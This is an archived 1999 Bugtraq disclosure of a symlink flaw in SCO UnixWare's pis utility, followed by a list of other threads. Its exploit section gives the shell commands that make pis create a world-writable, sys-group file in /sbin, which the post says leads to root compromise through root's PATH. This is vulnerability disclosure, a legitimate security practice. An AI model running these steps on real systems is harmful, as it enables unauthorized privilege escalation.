Bugtraq mailing list archives
UnixWare local pis exploit
From: btellier () USA NET (Brock Tellier)
Date: Mon, 27 Dec 1999 20:37:01 MST
Greetings, OVERVIEW A vulnerability in "/usr/local/bin/pis" on SCO UnixWare will allow any user to create arbitrary files with group "sys" privileges. A full root compromise is then trivial. BACKGROUND As usual, I've only tested UnixWare 7.1. DETAILS By creating a symlink between /tmp/pisdata and any sys-owned file we can overwrite that file with ps output. If we point the symlink at a non-existant file in a directory which we can write to (such as, say, /sbin/ls), pis will create this file mode 666 owned by us, group of sys. This is a fairly simple compromise. /sbin is writable by group sys. We can create files in /sbin owned by us. And root's default $PATH starts with /sbin. EXPLOIT bash-2.02$ ls -dal /sbin drwxrwxr-x 2 root sys 3072 Dec 28 08:18 /sbin bash-2.02$ ln -s /sbin/xnec /tmp/pisdata bash-2.02$ pis <program output> bash-2.02$ ls -la /sbin/xnec -rw-rw-rw- 1 xnec sys 5896 Dec 28 08:28 /sbin/xnec bash-2.02$ Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier () usa net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- Local / Remote Remote DoS Attack in Rover POP3 Server V1.1 NT From aVirt Ussr Labs (Dec 27)
- Remote DoS/Access Attack in Internet Anywhere Mail Server(POP 3) v2.3.1 Steven Alexander (Dec 27)
- Trend Micro InterScan VirusWall SMTP bug asl () USA ALCATEL COM (Dec 27)
- L0pht Advisory: initscripts-4.48-1 RedHat Linux 6.1 Mudge (Dec 27)
- UnixWare local pis exploit Brock Tellier (Dec 27)
- Third Party Software Affected by IIS "Escape Character Parsing" V ulnerability Microsoft Product Security Response Team (Dec 28)
- majordomo local exploit Brock Tellier (Dec 28)
- $cf Security flaw Shevek (Dec 02)
- Re: majordomo local exploit Christopher Schulte (Dec 28)
- Re: majordomo local exploit Todd C. Miller (Dec 28)
- AltaVista rudi carell (Dec 29)
- Re: majordomo local exploit Taneli Huuskonen (Dec 29)
- Re: majordomo local exploit Coolio (Dec 29)
- Re: majordomo local exploit Henrik Edlund (Dec 29)
- bna,sh Loneguard (Dec 30)